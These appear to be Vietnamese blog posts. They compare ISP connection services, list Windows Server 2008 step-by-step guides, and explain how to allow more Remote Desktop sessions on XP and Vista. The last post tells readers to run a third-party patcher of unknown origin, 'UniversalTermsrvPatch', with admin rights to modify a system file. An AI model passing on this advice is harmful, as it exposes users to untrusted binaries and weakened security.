· Nếu dữ liệu Cty bạn rất quan trọng và nhạy cảm thì sự lựa chọn dịch vụ kết nối cũng như nhà cung cấp dịch vụ cũng quan trọng không kém. Các trường hợp này yếu tố giá thành thường được xếp sau các yếu tố về bảo mật(secure) và độ tin cậy (reliability). Dịch vụ 3.1.1 Dịch vụ kênh thuê riêng là sự lựa chọn trong trường hợp này. Dữ liệu của Cty bạn sẽ được gửi thông qua kênh truyền riêng và được sự bảo đảm của ISP.

· Dịch vụ 3.1.2 Frame relay là sự lựa chọn tiếp theo với giá thành rẻ hơn tất nhiên dịch vụ này có chất lượng thấp hơn (băng thông không cố định) tuy nhiên về mặt bảo mật thì dịch vụ này vẫn đáp ứng tốt. Trên thực tế 3.1.2 không tạo được khoảng cách lớn về giá thành với 3.1.1

· Với các Cty cần một đường truyền site-to-site rẻ hơn, chúng ta có thể dùng 3.3.2 giá rẻ và được sự bảo đảm của ISP. Về lý thuyết thì tỷ lệ chất lượng/giá thành thì 3.3.2 là tối ưu. Công nghệ này tận dụng tối đa cơ sở hạ tầng mạng và ISP điều tiết việc gửi dữ liệu. Tuy nhiên việc dùng chung cơ sở hạ tầng mạng với các thuê bao internet thì vấn đề bảo mật lại trở thành điểm yếu.

Các dịch vụ trên, thông thường phía ISP sẽ hỗ trợ việc setup các thiết bị đầu cuối trong trường hợp bạn yêu cầu. ISP sẽ giải quyết các vấn đề trục trặc kỹ thuật của đường truyền trong thời gian sớm nhất (tùy theo cam kết của ISP).

· 3.3.1 Chỉ nên dùng trong trường hợp dữ liệu không đòi hỏi tính bảo mật quá cao. Việc hoạt động thông suốt của 3.3.1 hoàn toàn phụ thuộc vào hệ thống mạng internet. Việc bảo mật dữ liệu cũng hoàn toàn thuộc trách nhiệm của khách hàng. Trong thực tế vẫn chưa có trường hợp nào được báo cáo là các thuật toán dùng đễ mã hóa dữ liệu của VPN đã bị phá.

Internet: mang tính chất công cộng (public), các thiết bị được gán địa chỉ public, chúng có thể trao đổi dữ liệu với bất cứ thiết bị nào khác trên internet. Cũng giống trường hợp site-to-site

· Nếu mục đích kết nối internet của các bạn là thực sự quan trọng, cần một kết nối ổn định, chất lượng cao và không quan tâm nhiều đến giá thành thì 3.2.2 Dịch vụ Internet trực tiếp là sự lựa chọn của bạn. Dịch vụ này sẽ cho bạn gửi dữ liệu trực tiếp đến cổng internet với tốc độ cam kết của ISP.

· Phần lớn nhu cầu kết nối internet thường được dùng cho cá nhân với nhu cầu không quá cao về chất lượng, chúng ta có nhiều lựa chọn khác với chi phí phù hợp hơn. 3.2.3 Dịch vụ X_DSL Có thể nói là dịch vụ phổ biến nhất hiện nay với các ưu điểm về giá thành và chất lượng khá tốt.

· Dịch vụ 3.2.4 Cáp quang là công nghệ mới hơn, phù hợp với các khách hàng có nhu cầu cao hơn 3.2.3 nhưng không kham nổi chi phí của 3.2.2

· Các dịch vụ 3.2.3 3.2.4 đều sử dụng chung cơ sở hạ tầng mạng của ISP và băng thông đến các host quốc tế bị chia sẻ với các khách hàng khác.

NN
Chuyên mục:Computer-Internet

Windows Server 2008 Step-by-Step Guides

 

Overview :

These step-by-step guides help IT Professionals learn about and evaluate Windows Server 2008.
These documents are downloadable versions of guides found in the Windows Server 2008 Technical Library. (http://go.microsoft.com/fwlink/?LinkId=86808)

System Requirements:

Supported Operating Systems: Windows Server 2008

Files in This Download :

http://www.microsoft.com/downloads/details.aspx?FamilyID=518d870c-fa3e-4f6a-97f5-acaf31de6dce&displaylang=en

– Creating_and_Deploying_Active_Directory_Rights_Management_Se rvices_Templates_Step-by-Step_Guide.doc
– Deploying Active Directory Rights Management Services in a Multiple Forest Environment Step-by-Step Guide.doc
– Deploying Active Directory Rights Management Services in an Extranet Step-by-Step Guide.doc
– Deploying Active Directory Rights Management Services with Microsoft Office SharePoint Server 2007 Step-By-Step Guide.doc
– Deploying an Active Directory Rights Management Services Licensing-only Cluster Step-by-Step Guide.doc
– Deploying SSTP Remote Access Step by Step Guide.doc
– Removing Active Directory Rights Management Services Step-by-Step Guide.doc
– Server Manager Scenarios Step-by-Step Guide.doc
– Server_Core_Installation_Option_of_Windows_Server_2008_Step-By-Step_Guide.doc
– Step_by_Step_Guide_to_Customizing_TS_Web_Access_by_Using_Win dows_SharePoint_Services.doc
– Step-by-Step Guide for Configuring a Two-Node File Server Failover Cluster in Windows Server 2008.doc
– Step-by-Step Guide for Configuring a Two-Node Print Server Failover Cluster in Windows Server 2008.doc
– Step-by-Step Guide for File Server Resource Manager in Windows Server 2008.doc
– Step-by-Step Guide for Services for NFS in Windows Server 2008.doc
– Step-by-Step Guide for Storage Manager for SANs in Windows Server 2008.doc
– Step-by-Step Guide to Deploying Policies for Windows Firewall with Advanced Security.doc
– Step-by-Step_Guide_for_Configuring_Network_Load_Balancing_with_Termi nal_Services_in_Windows_Server_2008.doc
– Step-by-Step_Guide_for_Windows_Deployment_Services_in_Windows_Server _2008.doc
– TS RemoteApp Step-by-Step Guide.doc
– Using Identity Federation with Active Directory Rights Management Services Step-by-Step Guide.doc
– Windows Server 2008 Active Directory Certificate Services Step-By-Step Guide.doc
– Windows Server 2008 Foundation Network Guide.doc
– Windows Server 2008 Network Policy Server (NPS) Operations Guide.doc
– Windows Server 2008 Step-by-Step Guide for DNS in Small Networks.doc
– Windows Server 2008 TS Gateway Server Step-By-Step Setup Guide.doc
– Windows Server 2008 TS Licensing Step-By-Step Guide.doc
– Windows_ Server_Active_Directory_Rights_Management_Services_Step-by-Step_Guide.doc
– Windows_Server_2008_TS_Session_Broker_Load_Balancing_Step-By-Step_Guide.doc

Chuyên mục:Computer-Internet

Tăng số lượng phiên kết nối remote desktop trong WinXP ,Vista

Thực hiện tăng số lượng phiên kết nối trong winXP bằng tools
– Thực hiện enable chức năng remote desktop bằng script

Nếu bạn đã từng học MCSA thì chắc hẳn các bạn cũng biết mặc định OS XP chỉ cho phép 1 phiên kết nối vào một thời điểm mà thôi. Tức là, nếu bạn cho phép một user remote vào máy XP thì user tại máy đó phải logoff.

Trong nhiều tình huống thực tế ta cần trên một phiên kết nối, đo đó phải sửa đổi trong registry của windows. Trên mạng hiện đã có nhiều bài hướng dẫn các bạn thực hiện bằng cách dùng lệnh regedit để chỉnh sửa trong registry editor.

Nhưng nay mình sẽ giới thiệu với mọi người thực hiện thao tác này bằng một chương trình nhỏ mà mình đã tham khảo được, chương trình này do tác giả người TQ viết.

Các bước thực hiện

Gồm phần chính: Tăng số phiên kết nối và enable chức năng remote deskop.

Bước 1: Download chương trình sau về (dùng 1 trong 3 link)


Bước 2: Giải nén và thực hiện lần lượt (chú ý là lúc này bạn chưa enable chức năng remote desktop trong windows)

B2.1 Chạy file UniversalTermsrvPatch-x86.exe đối với các OS x86 phổ biến hiện nay ở VN. Bạn sẽ có cửa sổ sau (lúc này bạn đăng nhập với quyền admin nhé)

Click vào patch và khởi động lại máy tính.

B2.2 Chạy file xp.reg nếu bạn dùng XP, chạy file vista.reg nếu bạn dùng VISTA.

Bước 3: Enable chức năng remote desktop.

Thường thường các bạn thực hiện việc này bằng thao tác click chuột, ở bài này mình sẽ giới thiệu một script để enable remote desktop. bạn hãy download script này về và clik vào nó, nó sẽ thực hện giúp bạn.


Bước 4:
Thực hiện remote từ một máy khác. Cần chú ý lúc này bạn phải đặt mật khẩu cho user ở máy được remote, và User phải có quyền remote

Hãy thử và trải nghiệm !

Chúc thành công

Chuyên mục:Computer-Internet